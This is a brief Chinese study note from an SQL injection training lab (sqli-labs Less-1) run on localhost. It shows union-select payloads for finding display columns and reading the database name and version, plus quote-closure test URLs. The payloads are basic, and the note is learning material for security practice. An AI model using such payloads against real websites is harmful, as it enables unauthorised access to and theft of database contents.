本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动
字符型(单引号,小括号,双引号…)注意闭合
练习一、Less-1 单引号闭合 + union 联合查询
查询语句格式:
1, union select 1,2,3 (字段的显示位)
2, union select 1,database(),version() (查询当前数据库名及版本号)
注意:因5.0以上的可以用information_schema,5.0一下的没有,所以要查版本号
实操练习:
1、 http://127.0.0.1/sqli/Less-1/index.php?id=1
http://127.0.0.1/sqli/Less-1/index.php?id=1%27
备注:对特殊字符的过滤,是一种简单的防护
http://127.0.0.1/sqli/Less-1/index.php?id=2’ and 1=2 %23